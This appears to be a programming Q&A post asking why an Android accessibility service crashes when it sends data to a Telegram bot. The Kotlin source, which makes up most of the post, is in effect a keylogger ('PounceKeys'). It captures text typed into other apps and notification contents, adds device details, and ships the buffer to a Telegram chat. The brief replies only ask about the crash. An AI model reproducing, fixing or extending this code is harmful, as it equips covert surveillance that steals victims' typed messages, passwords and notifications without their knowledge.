Android Accessibility Service Crashes When Sending Data to Telegram Bot
I'm developing an Android Accessibility Service that listens for text changes and notifications, then sends the collected data to a Telegram bot using the com.pengrad.telegrambot library.
The crash seems to be related to the Telegram API call.
package com.pok

import android.widget.Toast
import android.accessibilityservice.AccessibilityService
import android.accessibilityservice.AccessibilityServiceInfo
import android.content.Context
import android.os.AsyncTask
import android.os.Build
import android.util.Log
import android.view.accessibility.AccessibilityEvent
import com.pengrad.telegrambot.TelegramBot
import com.pengrad.telegrambot.UpdatesListener
import com.pengrad.telegrambot.model.Update
import com.pengrad.telegrambot.request.SendMessage

class MyAccessibilityService : AccessibilityService() {
    private val currentKeyEvents = StringBuilder()
    private var keyEventCount = 0
    private lateinit var bot: TelegramBot

    override fun onAccessibilityEvent(event: AccessibilityEvent) {
        when (event.eventType) {
            AccessibilityEvent.TYPE_VIEW_TEXT_CHANGED -> handleTextChangedEvent(event)
            AccessibilityEvent.TYPE_NOTIFICATION_STATE_CHANGED -> handleNotificationChangedEvent(event)
            else -> {
                // Handle other event types if needed
            }
        }
    }

    private fun handleTextChangedEvent(event: AccessibilityEvent) {
        // Handle text changed events
        val textList = event.text
    Toast.makeText(applicationContext, "textList: $textList", Toast.LENGTH_SHORT).show()
        for (text in textList) {
            val newText = text.toString()
            val newKeyEventCount = countKeyEvents(newText)

            if (newKeyEventCount > keyEventCount) {
                currentKeyEvents.append(newText.substring(keyEventCount))

                if (currentKeyEvents.length >= MAX_BUFFER_SIZE) {
                    sendBufferToTelegramAndClear()
                }
            }

            keyEventCount = newKeyEventCount
        }
    }

    private fun handleNotificationChangedEvent(event: AccessibilityEvent) {
        val notificationTextBuilder = StringBuilder()
        for (text in event.text) {
            notificationTextBuilder.append(text)
        }
        val notificationText = notificationTextBuilder.toString()

        if (notificationText.isNotEmpty()) {
            // Append notification text to the buffer along with log message
            currentKeyEvents.append("Notification: ").append(notificationText).append("\n")

            // Check buffer size
            if (currentKeyEvents.length >= MAX_BUFFER_SIZE) {
                sendBufferToTelegramAndClear()
            }
        }
    }

    private fun countKeyEvents(text: String): Int {
        // Count the number of key events (assuming each character is a key event)
        return text.length
    }

    private fun sendBufferToTelegramAndClear() {
        var log = currentKeyEvents.toString()

        // Append MANUFACTURER and MODEL to the log message
        val deviceInfo = "MANUFACTURER: ${Build.MANUFACTURER}\n" +
                "MODEL: ${Build.MODEL}\n"

        log = deviceInfo + log

        bot.execute(SendMessage(CHAT_ID, log))
        currentKeyEvents.setLength(0) // Clear the builder
    }

    override fun onInterrupt() {
        // Handle interruption
    }

    override fun onServiceConnected() {
        super.onServiceConnected()
        val info = AccessibilityServiceInfo()
        info.flags = AccessibilityServiceInfo.DEFAULT
        info.eventTypes = AccessibilityEvent.TYPES_ALL_MASK
        info.feedbackType = AccessibilityServiceInfo.FEEDBACK_GENERIC
        serviceInfo = info

        // Initialize Telegram bot
        bot = TelegramBot(BOT_TOKEN)
        bot.setUpdatesListener { updates ->
            for (update in updates) {
                handleTelegramUpdate(update)
            }
            UpdatesListener.CONFIRMED_UPDATES_ALL
        }

        // Check if it's the first run
        val prefs = getSharedPreferences("MyPrefs", Context.MODE_PRIVATE)
        val isFirstRun = prefs.getBoolean("FirstRun", true)

        if (isFirstRun) {
            // Gather device details
            val deviceDetails = getSYSInfo()

            // Send the gathered information to Telegram
            currentKeyEvents.append(deviceDetails).append("\n")
        Toast.makeText(applicationContext, "textList: $deviceDetails", Toast.LENGTH_SHORT).show() 
            sendBufferToTelegramAndClear()
            val editor = prefs.edit()
            editor.putBoolean("FirstRun", false)
            editor.apply()
        }
    }

    private fun handleTelegramUpdate(update: Update) {
        val message = update.message()
        if (message != null && message.text() != null) {
            val text = message.text()
            // Handle incoming Telegram messages
            when {
                text.startsWith("/start") -> {
                    bot.execute(SendMessage(message.chat().id(), "Welcome to PounceKeys!"))
                }
                text.startsWith("/help") -> {
                    bot.execute(SendMessage(message.chat().id(), "Available commands:\n/start - Start the bot\n/help - Show help"))
                }
                else -> {
                    bot.execute(SendMessage(message.chat().id(), "Unknown command. Use /help for available commands."))
                }
            }
        }
    }

    private fun getSYSInfo(): String {
        return "MANUFACTURER : ${Build.MANUFACTURER}\n" +
                "MODEL : ${Build.MODEL}\n" +
                "PRODUCT : ${Build.PRODUCT}\n" +
                "VERSION.RELEASE : ${Build.VERSION.RELEASE}\n" +
                "VERSION.INCREMENTAL : ${Build.VERSION.INCREMENTAL}\n" +
                "VERSION.SDK.NUMBER : ${Build.VERSION.SDK_INT}\n" +
                "BOARD : ${Build.BOARD}\n"
    }

    companion object {
        private const val BOT_TOKEN = "bot_token"
        private const val CHAT_ID = "chat_id"
        private const val MAX_BUFFER_SIZE = 200
    }
}


Upon reviewing the network traffic, it's confirmed that the request is being sent to the Telegram API, yet I'm not receiving the message in Telegram, and the application crashes.

what is the crash?

"app_name keeps stopping."

Does this answer your question? Unfortunately MyApp has stopped. How can I solve this?
